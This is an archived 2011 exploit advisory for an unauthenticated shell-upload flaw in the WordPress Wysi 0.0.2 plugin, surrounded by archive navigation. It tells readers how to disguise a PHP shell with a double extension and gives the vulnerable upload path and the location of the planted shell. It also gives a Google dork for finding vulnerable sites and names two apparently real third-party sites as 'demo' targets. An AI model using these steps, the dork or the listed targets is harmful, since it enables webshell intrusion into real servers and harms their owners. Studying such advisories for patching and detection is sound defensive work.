WordPress Wysi 0.0.2 Shell Upload

WordPress Wysi 0.0.2 Shell Upload: Posted Jun 14, 2011; Authored by Net.Edit0r; The WordPress Wysi plugin version 0.0.2 suffers from a shell upload vulnerability.; tags | exploit, shell; SHA-256 | 8d9e486111ef64c9e44b4735f860662342db16afdc037f7b4f8a2d7a59a04007; Download | Favorite | View

WordPress Wysi 0.0.2 Shell Upload

# Exploit Title: WordPress Wysi Plugin Arbitrary File upload Vulnerability
# Date: June, 14th 2011 [GMT +7]
# Author: Net.Edit0r
# Software Link: http://wordpress.org/extend/plugins/real-wysiwyg/
# Version : 0.0.2
# Tested on: ubuntu 11.04
# CVE : -

-----------------------------------------------------------------------------------------
WordPress Wysi Plugin Arbitrary File upload Vulnerability => RFU Vulnerability
-----------------------------------------------------------------------------------------

Author : Net.Edit0r
Date : June, 14th 2011 [GMT +7]
Location : Iran
Web : http://Black-Hg.Org
Critical Lvl : Medium
Where : From Remote
My Group : Black Hat Group #BHG
---------------------------------------------------------------------------


Vulnerability:
~~~~~~~~~~~~
in this file you can upload image files without any authentication.

for uploading shell you must change extension of file to
.php.gif(shell.php.gif)

or any other image extension.successful attack depend to host and
server config.



PoC/Exploit:
~~~~~~~~~~

~ [PoC] ~: /wp-content/plugins/Wysi-Wordpress/plugins/filemanager/InsertFile/insert_file.php

~ [PoC] ~: Http://[victim]/path-to-wp/wp-content/plugins/Wysi-Wordpress/plugins/filemanager/InsertFile/insert_file.php

         [ Upload To : /wp-content/content/shell.php.jpg ]

Dork:
~~~~~
Google : inurl:"/filemanager/InsertFile/insert_file.php"


Demo URL:
~~~~~~~~~
- http://www.kalamu.com/bol/wp-content/plugins/filemanager/InsertFile/insert_file.php

- http://www.afofoundation.org/wp-content/plugins/Wysi-Wordpress/plugins/filemanager/InsertFile/insert_file.php


 Timeline:
~~~~~~~~~
- 13 - 06 - 2011 bug found.
- 13 - 06 - 2011 vendor contacted, but no response.
- 14 - 06 - 2011 Advisories release.

 Contact:
~~~~~~~~~
Net.Edit0r@att.net ~ Black.hat.tm@gmail.com

---------------------------------------------------------------------------
Greetz To :DarkCoder | 3H34N | Amir-MaGiC | H3x | D3adlY |Cho0bin and
all bhg member

Spical Th4nks: B3hz4d | M4Hd1 | GeNeRaLL | Mikili And All My Friendz

[!] Persian Gulf 4 Ever
[!] I Love Iran And All Iranian People
-------------------------------- [ EOF ] ----------------------------------

Top Authors In Last 30 Days

Red Hat 248 files
Ubuntu 91 files
indoushka 58 files
Jasper Nota 25 files
Willem Westerhof 19 files
Gentoo 13 files
Debian 13 files
Jim Blankendaal 11 files
Martijn Baalman 9 files
Apple 9 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,087)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,536)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,612)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,441)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,727)
UNIX (9,433)
UnixWare (187)
Windows (6,668)
Other

WordPress Wysi 0.0.2 Shell Upload

WordPress Wysi 0.0.2 Shell Upload

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

WordPress Wysi 0.0.2 Shell Upload

Share This

WordPress Wysi 0.0.2 Shell Upload

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems